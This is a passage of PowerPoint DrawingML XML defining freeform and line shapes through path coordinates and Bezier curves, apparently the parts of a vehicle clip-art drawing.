                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="255"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="458" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="187" y="44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7" name="Freeform 1107"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="611" y="5357"/>
                  <a:ext cx="498" cy="549"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 168 w 211"/>
                    <a:gd name="T1" fmla="*/ 67 h 232"/>
                    <a:gd name="T2" fmla="*/ 46 w 211"/>
                    <a:gd name="T3" fmla="*/ 15 h 232"/>
                    <a:gd name="T4" fmla="*/ 46 w 211"/>
                    <a:gd name="T5" fmla="*/ 15 h 232"/>
                    <a:gd name="T6" fmla="*/ 12 w 211"/>
                    <a:gd name="T7" fmla="*/ 23 h 232"/>
                    <a:gd name="T8" fmla="*/ 19 w 211"/>
                    <a:gd name="T9" fmla="*/ 38 h 232"/>
                    <a:gd name="T10" fmla="*/ 41 w 211"/>
                    <a:gd name="T11" fmla="*/ 164 h 232"/>
                    <a:gd name="T12" fmla="*/ 100 w 211"/>
                    <a:gd name="T13" fmla="*/ 212 h 232"/>
                    <a:gd name="T14" fmla="*/ 109 w 211"/>
                    <a:gd name="T15" fmla="*/ 232 h 232"/>
                    <a:gd name="T16" fmla="*/ 154 w 211"/>
                    <a:gd name="T17" fmla="*/ 220 h 232"/>
                    <a:gd name="T18" fmla="*/ 154 w 211"/>
                    <a:gd name="T19" fmla="*/ 220 h 232"/>
                    <a:gd name="T20" fmla="*/ 176 w 211"/>
                    <a:gd name="T21" fmla="*/ 209 h 232"/>
                    <a:gd name="T22" fmla="*/ 168 w 211"/>
                    <a:gd name="T23" fmla="*/ 67 h 23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11"/>
                    <a:gd name="T37" fmla="*/ 0 h 232"/>
                    <a:gd name="T38" fmla="*/ 211 w 211"/>
                    <a:gd name="T39" fmla="*/ 232 h 232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11" h="232">
                      <a:moveTo>
                        <a:pt x="168" y="67"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="134" y="21"/>
                        <a:pt x="82" y="0"/>
                        <a:pt x="46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9" y="38"/>
                        <a:pt x="19" y="38"/>
                        <a:pt x="19" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="70"/>
                        <a:pt x="8" y="121"/>
                        <a:pt x="41" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="187"/>
                        <a:pt x="79" y="203"/>
                        <a:pt x="100" y="212"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="232"/>
                        <a:pt x="109" y="232"/>
                        <a:pt x="109" y="232"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="154" y="220"/>
                        <a:pt x="154" y="220"/>
                        <a:pt x="154" y="220"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="154" y="220"/>
                        <a:pt x="154" y="220"/>
                        <a:pt x="154" y="220"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="162" y="218"/>
                        <a:pt x="169" y="214"/>
                        <a:pt x="176" y="209"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="211" y="183"/>
                        <a:pt x="208" y="119"/>
                        <a:pt x="168" y="67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8" name="Freeform 1108"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="502" y="5374"/>
                  <a:ext cx="503" cy="569"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 178 w 213"/>
                    <a:gd name="T1" fmla="*/ 214 h 241"/>
                    <a:gd name="T2" fmla="*/ 43 w 213"/>
                    <a:gd name="T3" fmla="*/ 169 h 241"/>
                    <a:gd name="T4" fmla="*/ 35 w 213"/>
                    <a:gd name="T5" fmla="*/ 27 h 241"/>
                    <a:gd name="T6" fmla="*/ 170 w 213"/>
                    <a:gd name="T7" fmla="*/ 72 h 241"/>
                    <a:gd name="T8" fmla="*/ 178 w 213"/>
                    <a:gd name="T9" fmla="*/ 214 h 24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13"/>
                    <a:gd name="T16" fmla="*/ 0 h 241"/>
                    <a:gd name="T17" fmla="*/ 213 w 213"/>
                    <a:gd name="T18" fmla="*/ 241 h 24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13" h="241">
                      <a:moveTo>
                        <a:pt x="178" y="214"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="142" y="241"/>
                        <a:pt x="82" y="221"/>
                        <a:pt x="43" y="169"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="117"/>
                        <a:pt x="0" y="54"/>
                        <a:pt x="35" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="0"/>
                        <a:pt x="131" y="20"/>
                        <a:pt x="170" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="210" y="124"/>
                        <a:pt x="213" y="188"/>
                        <a:pt x="178" y="214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9" name="Freeform 1109"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="602" y="5485"/>
                  <a:ext cx="304" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 129"/>
                    <a:gd name="T1" fmla="*/ 131 h 147"/>
                    <a:gd name="T2" fmla="*/ 26 w 129"/>
                    <a:gd name="T3" fmla="*/ 103 h 147"/>
                    <a:gd name="T4" fmla="*/ 21 w 129"/>
                    <a:gd name="T5" fmla="*/ 17 h 147"/>
                    <a:gd name="T6" fmla="*/ 103 w 129"/>
                    <a:gd name="T7" fmla="*/ 44 h 147"/>
                    <a:gd name="T8" fmla="*/ 108 w 129"/>
                    <a:gd name="T9" fmla="*/ 13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9"/>
                    <a:gd name="T16" fmla="*/ 0 h 147"/>
                    <a:gd name="T17" fmla="*/ 129 w 129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9" h="147">
                      <a:moveTo>
                        <a:pt x="108" y="131"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="86" y="147"/>
                        <a:pt x="50" y="135"/>
                        <a:pt x="26" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="72"/>
                        <a:pt x="0" y="33"/>
                        <a:pt x="21" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="0"/>
                        <a:pt x="79" y="13"/>
                        <a:pt x="103" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="127" y="76"/>
                        <a:pt x="129" y="114"/>
                        <a:pt x="108" y="131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0" name="Freeform 1110"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1189" y="4859"/>
                  <a:ext cx="498" cy="548"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 168 w 211"/>
                    <a:gd name="T1" fmla="*/ 67 h 232"/>
                    <a:gd name="T2" fmla="*/ 46 w 211"/>
                    <a:gd name="T3" fmla="*/ 15 h 232"/>
                    <a:gd name="T4" fmla="*/ 46 w 211"/>
                    <a:gd name="T5" fmla="*/ 14 h 232"/>
                    <a:gd name="T6" fmla="*/ 12 w 211"/>
                    <a:gd name="T7" fmla="*/ 23 h 232"/>
                    <a:gd name="T8" fmla="*/ 19 w 211"/>
                    <a:gd name="T9" fmla="*/ 38 h 232"/>
                    <a:gd name="T10" fmla="*/ 41 w 211"/>
                    <a:gd name="T11" fmla="*/ 164 h 232"/>
                    <a:gd name="T12" fmla="*/ 100 w 211"/>
                    <a:gd name="T13" fmla="*/ 212 h 232"/>
                    <a:gd name="T14" fmla="*/ 109 w 211"/>
                    <a:gd name="T15" fmla="*/ 232 h 232"/>
                    <a:gd name="T16" fmla="*/ 154 w 211"/>
                    <a:gd name="T17" fmla="*/ 219 h 232"/>
                    <a:gd name="T18" fmla="*/ 154 w 211"/>
                    <a:gd name="T19" fmla="*/ 219 h 232"/>
                    <a:gd name="T20" fmla="*/ 176 w 211"/>
                    <a:gd name="T21" fmla="*/ 209 h 232"/>
                    <a:gd name="T22" fmla="*/ 168 w 211"/>
                    <a:gd name="T23" fmla="*/ 67 h 23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11"/>
                    <a:gd name="T37" fmla="*/ 0 h 232"/>
                    <a:gd name="T38" fmla="*/ 211 w 211"/>
                    <a:gd name="T39" fmla="*/ 232 h 232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11" h="232">
                      <a:moveTo>
                        <a:pt x="168" y="67"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="133" y="21"/>
                        <a:pt x="82" y="0"/>
                        <a:pt x="46" y="15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9" y="38"/>
                        <a:pt x="19" y="38"/>
                        <a:pt x="19" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="70"/>
                        <a:pt x="8" y="121"/>
                        <a:pt x="41" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="186"/>
                        <a:pt x="78" y="203"/>
                        <a:pt x="100" y="212"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="232"/>
                        <a:pt x="109" y="232"/>
                        <a:pt x="109" y="232"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="154" y="219"/>
                        <a:pt x="154" y="219"/>
                        <a:pt x="154" y="219"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="154" y="219"/>
                        <a:pt x="154" y="219"/>
                        <a:pt x="154" y="219"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="162" y="218"/>
                        <a:pt x="169" y="214"/>
                        <a:pt x="176" y="209"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="211" y="183"/>
                        <a:pt x="207" y="119"/>
                        <a:pt x="168" y="67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1" name="Freeform 1111"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1298" y="4875"/>
                  <a:ext cx="503" cy="570"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 177 w 213"/>
                    <a:gd name="T1" fmla="*/ 214 h 241"/>
                    <a:gd name="T2" fmla="*/ 42 w 213"/>
                    <a:gd name="T3" fmla="*/ 169 h 241"/>
                    <a:gd name="T4" fmla="*/ 35 w 213"/>
                    <a:gd name="T5" fmla="*/ 27 h 241"/>
                    <a:gd name="T6" fmla="*/ 170 w 213"/>
                    <a:gd name="T7" fmla="*/ 72 h 241"/>
                    <a:gd name="T8" fmla="*/ 177 w 213"/>
                    <a:gd name="T9" fmla="*/ 214 h 24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13"/>
                    <a:gd name="T16" fmla="*/ 0 h 241"/>
                    <a:gd name="T17" fmla="*/ 213 w 213"/>
                    <a:gd name="T18" fmla="*/ 241 h 24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13" h="241">
                      <a:moveTo>
                        <a:pt x="177" y="214"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="142" y="241"/>
                        <a:pt x="82" y="221"/>
                        <a:pt x="42" y="169"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="117"/>
                        <a:pt x="0" y="53"/>
                        <a:pt x="35" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="0"/>
                        <a:pt x="131" y="20"/>
                        <a:pt x="170" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="209" y="124"/>
                        <a:pt x="213" y="187"/>
                        <a:pt x="177" y="214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Freeform 1112"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1201" y="4987"/>
                  <a:ext cx="307" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 130"/>
                    <a:gd name="T1" fmla="*/ 130 h 147"/>
                    <a:gd name="T2" fmla="*/ 26 w 130"/>
                    <a:gd name="T3" fmla="*/ 103 h 147"/>
                    <a:gd name="T4" fmla="*/ 22 w 130"/>
                    <a:gd name="T5" fmla="*/ 16 h 147"/>
                    <a:gd name="T6" fmla="*/ 104 w 130"/>
                    <a:gd name="T7" fmla="*/ 44 h 147"/>
                    <a:gd name="T8" fmla="*/ 108 w 130"/>
                    <a:gd name="T9" fmla="*/ 13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30"/>
                    <a:gd name="T16" fmla="*/ 0 h 147"/>
                    <a:gd name="T17" fmla="*/ 130 w 130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30" h="147">
                      <a:moveTo>
                        <a:pt x="108" y="130"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="147"/>
                        <a:pt x="50" y="134"/>
                        <a:pt x="26" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="71"/>
                        <a:pt x="0" y="33"/>
                        <a:pt x="22" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="0"/>
                        <a:pt x="80" y="12"/>
                        <a:pt x="104" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="128" y="75"/>
                        <a:pt x="130" y="114"/>
                        <a:pt x="108" y="13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3" name="Freeform 1113"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1496" y="3465"/>
                  <a:ext cx="2740" cy="2393"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1144 w 1160"/>
                    <a:gd name="T1" fmla="*/ 727 h 1013"/>
                    <a:gd name="T2" fmla="*/ 1054 w 1160"/>
                    <a:gd name="T3" fmla="*/ 679 h 1013"/>
                    <a:gd name="T4" fmla="*/ 954 w 1160"/>
                    <a:gd name="T5" fmla="*/ 346 h 1013"/>
                    <a:gd name="T6" fmla="*/ 876 w 1160"/>
                    <a:gd name="T7" fmla="*/ 233 h 1013"/>
                    <a:gd name="T8" fmla="*/ 0 w 1160"/>
                    <a:gd name="T9" fmla="*/ 0 h 1013"/>
                    <a:gd name="T10" fmla="*/ 0 w 1160"/>
                    <a:gd name="T11" fmla="*/ 713 h 1013"/>
                    <a:gd name="T12" fmla="*/ 99 w 1160"/>
                    <a:gd name="T13" fmla="*/ 739 h 1013"/>
                    <a:gd name="T14" fmla="*/ 110 w 1160"/>
                    <a:gd name="T15" fmla="*/ 613 h 1013"/>
                    <a:gd name="T16" fmla="*/ 261 w 1160"/>
                    <a:gd name="T17" fmla="*/ 663 h 1013"/>
                    <a:gd name="T18" fmla="*/ 292 w 1160"/>
                    <a:gd name="T19" fmla="*/ 791 h 1013"/>
                    <a:gd name="T20" fmla="*/ 858 w 1160"/>
                    <a:gd name="T21" fmla="*/ 943 h 1013"/>
                    <a:gd name="T22" fmla="*/ 873 w 1160"/>
                    <a:gd name="T23" fmla="*/ 824 h 1013"/>
                    <a:gd name="T24" fmla="*/ 1024 w 1160"/>
                    <a:gd name="T25" fmla="*/ 874 h 1013"/>
                    <a:gd name="T26" fmla="*/ 1056 w 1160"/>
                    <a:gd name="T27" fmla="*/ 996 h 1013"/>
                    <a:gd name="T28" fmla="*/ 1089 w 1160"/>
                    <a:gd name="T29" fmla="*/ 1005 h 1013"/>
                    <a:gd name="T30" fmla="*/ 1144 w 1160"/>
                    <a:gd name="T31" fmla="*/ 1013 h 1013"/>
                    <a:gd name="T32" fmla="*/ 1144 w 1160"/>
                    <a:gd name="T33" fmla="*/ 727 h 1013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160"/>
                    <a:gd name="T52" fmla="*/ 0 h 1013"/>
                    <a:gd name="T53" fmla="*/ 1160 w 1160"/>
                    <a:gd name="T54" fmla="*/ 1013 h 1013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160" h="1013">
                      <a:moveTo>
                        <a:pt x="1144" y="727"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1127" y="704"/>
                        <a:pt x="1054" y="679"/>
                        <a:pt x="1054" y="679"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="954" y="346"/>
                        <a:pt x="954" y="346"/>
                        <a:pt x="954" y="346"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="954" y="346"/>
                        <a:pt x="934" y="250"/>
                        <a:pt x="876" y="23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713"/>
                        <a:pt x="0" y="713"/>
                        <a:pt x="0" y="713"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="99" y="739"/>
                        <a:pt x="99" y="739"/>
                        <a:pt x="99" y="739"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="689"/>
                        <a:pt x="78" y="637"/>
                        <a:pt x="110" y="613"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="583"/>
                        <a:pt x="217" y="605"/>
                        <a:pt x="261" y="663"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="294" y="706"/>
                        <a:pt x="304" y="756"/>
                        <a:pt x="292" y="791"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="858" y="943"/>
                        <a:pt x="858" y="943"/>
                        <a:pt x="858" y="943"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="837" y="895"/>
                        <a:pt x="842" y="847"/>
                        <a:pt x="873" y="824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="912" y="794"/>
                        <a:pt x="980" y="816"/>
                        <a:pt x="1024" y="874"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1054" y="915"/>
                        <a:pt x="1066" y="961"/>
                        <a:pt x="1056" y="996"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1089" y="1005"/>
                        <a:pt x="1089" y="1005"/>
                        <a:pt x="1089" y="1005"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1144" y="1013"/>
                        <a:pt x="1144" y="1013"/>
                        <a:pt x="1144" y="1013"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1144" y="1013"/>
                        <a:pt x="1160" y="750"/>
                        <a:pt x="1144" y="72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4" name="Freeform 1114"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1496" y="3101"/>
                  <a:ext cx="3413" cy="915"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1344 w 3413"/>
                    <a:gd name="T1" fmla="*/ 0 h 915"/>
                    <a:gd name="T2" fmla="*/ 0 w 3413"/>
                    <a:gd name="T3" fmla="*/ 364 h 915"/>
                    <a:gd name="T4" fmla="*/ 1344 w 3413"/>
                    <a:gd name="T5" fmla="*/ 721 h 915"/>
                    <a:gd name="T6" fmla="*/ 1564 w 3413"/>
                    <a:gd name="T7" fmla="*/ 780 h 915"/>
                    <a:gd name="T8" fmla="*/ 2069 w 3413"/>
                    <a:gd name="T9" fmla="*/ 915 h 915"/>
                    <a:gd name="T10" fmla="*/ 3413 w 3413"/>
                    <a:gd name="T11" fmla="*/ 551 h 915"/>
                    <a:gd name="T12" fmla="*/ 1344 w 3413"/>
                    <a:gd name="T13" fmla="*/ 0 h 9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413"/>
                    <a:gd name="T22" fmla="*/ 0 h 915"/>
                    <a:gd name="T23" fmla="*/ 3413 w 3413"/>
                    <a:gd name="T24" fmla="*/ 915 h 9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413" h="915">
                      <a:moveTo>
                        <a:pt x="1344" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="721"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1564" y="780"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2069" y="915"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3413" y="551"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="134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" name="Freeform 1115"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="573" y="3652"/>
                  <a:ext cx="1767" cy="1417"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 747 w 748"/>
                    <a:gd name="T1" fmla="*/ 446 h 600"/>
                    <a:gd name="T2" fmla="*/ 647 w 748"/>
                    <a:gd name="T3" fmla="*/ 113 h 600"/>
                    <a:gd name="T4" fmla="*/ 569 w 748"/>
                    <a:gd name="T5" fmla="*/ 0 h 600"/>
                    <a:gd name="T6" fmla="*/ 0 w 748"/>
                    <a:gd name="T7" fmla="*/ 154 h 600"/>
                    <a:gd name="T8" fmla="*/ 78 w 748"/>
                    <a:gd name="T9" fmla="*/ 267 h 600"/>
                    <a:gd name="T10" fmla="*/ 178 w 748"/>
                    <a:gd name="T11" fmla="*/ 600 h 600"/>
                    <a:gd name="T12" fmla="*/ 748 w 748"/>
                    <a:gd name="T13" fmla="*/ 447 h 600"/>
                    <a:gd name="T14" fmla="*/ 747 w 748"/>
                    <a:gd name="T15" fmla="*/ 446 h 60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748"/>
                    <a:gd name="T25" fmla="*/ 0 h 600"/>
                    <a:gd name="T26" fmla="*/ 748 w 748"/>
                    <a:gd name="T27" fmla="*/ 600 h 600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748" h="600">
                      <a:moveTo>
                        <a:pt x="747" y="446"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="647" y="113"/>
                        <a:pt x="647" y="113"/>
                        <a:pt x="647" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="647" y="113"/>
                        <a:pt x="626" y="18"/>
                        <a:pt x="569" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="154"/>
                        <a:pt x="0" y="154"/>
                        <a:pt x="0" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="171"/>
                        <a:pt x="78" y="267"/>
                        <a:pt x="78" y="267"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="600"/>
                        <a:pt x="178" y="600"/>
                        <a:pt x="178" y="600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="748" y="447"/>
                        <a:pt x="748" y="447"/>
                        <a:pt x="748" y="447"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="747" y="447"/>
                        <a:pt x="747" y="446"/>
                        <a:pt x="747" y="44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" name="Line 1116"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="-1227" y="3392"/>
                  <a:ext cx="2067" cy="55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Line 1117"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="-960" y="3321"/>
                  <a:ext cx="2067" cy="55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Line 1118"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="-693" y="3248"/>
                  <a:ext cx="2067" cy="55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Line 1119"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="-426" y="3177"/>
                  <a:ext cx="2067" cy="55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Freeform 1120"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1399" y="3708"/>
                  <a:ext cx="1443" cy="1106"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1443"/>
                    <a:gd name="T1" fmla="*/ 0 h 1106"/>
                    <a:gd name="T2" fmla="*/ 0 w 1443"/>
                    <a:gd name="T3" fmla="*/ 721 h 1106"/>
                    <a:gd name="T4" fmla="*/ 1443 w 1443"/>
                    <a:gd name="T5" fmla="*/ 1106 h 1106"/>
                    <a:gd name="T6" fmla="*/ 1443 w 1443"/>
                    <a:gd name="T7" fmla="*/ 385 h 1106"/>
                    <a:gd name="T8" fmla="*/ 0 w 1443"/>
                    <a:gd name="T9" fmla="*/ 0 h 11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43"/>
                    <a:gd name="T16" fmla="*/ 0 h 1106"/>
                    <a:gd name="T17" fmla="*/ 1443 w 1443"/>
                    <a:gd name="T18" fmla="*/ 1106 h 11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43" h="1106">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="721"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1443" y="1106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1443" y="38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Freeform 1121"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="141" y="4119"/>
                  <a:ext cx="581" cy="1534"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 581 w 581"/>
                    <a:gd name="T1" fmla="*/ 154 h 1534"/>
                    <a:gd name="T2" fmla="*/ 0 w 581"/>
                    <a:gd name="T3" fmla="*/ 0 h 1534"/>
                    <a:gd name="T4" fmla="*/ 0 w 581"/>
                    <a:gd name="T5" fmla="*/ 1470 h 1534"/>
                    <a:gd name="T6" fmla="*/ 236 w 581"/>
                    <a:gd name="T7" fmla="*/ 1534 h 1534"/>
                    <a:gd name="T8" fmla="*/ 572 w 581"/>
                    <a:gd name="T9" fmla="*/ 1035 h 1534"/>
                    <a:gd name="T10" fmla="*/ 581 w 581"/>
                    <a:gd name="T11" fmla="*/ 154 h 153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81"/>
                    <a:gd name="T19" fmla="*/ 0 h 1534"/>
                    <a:gd name="T20" fmla="*/ 581 w 581"/>
                    <a:gd name="T21" fmla="*/ 1534 h 153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81" h="1534">
                      <a:moveTo>
                        <a:pt x="581" y="154"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="1534"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="1035"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="581" y="15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" name="Freeform 1122"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="753" y="4370"/>
                  <a:ext cx="210" cy="692"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 210 w 210"/>
                    <a:gd name="T1" fmla="*/ 692 h 692"/>
                    <a:gd name="T2" fmla="*/ 0 w 210"/>
                    <a:gd name="T3" fmla="*/ 635 h 692"/>
                    <a:gd name="T4" fmla="*/ 4 w 210"/>
                    <a:gd name="T5" fmla="*/ 0 h 692"/>
                    <a:gd name="T6" fmla="*/ 210 w 210"/>
                    <a:gd name="T7" fmla="*/ 692 h 69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0"/>
                    <a:gd name="T13" fmla="*/ 0 h 692"/>
                    <a:gd name="T14" fmla="*/ 210 w 210"/>
                    <a:gd name="T15" fmla="*/ 692 h 69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0" h="692">
                      <a:moveTo>
                        <a:pt x="210" y="692"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="635"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
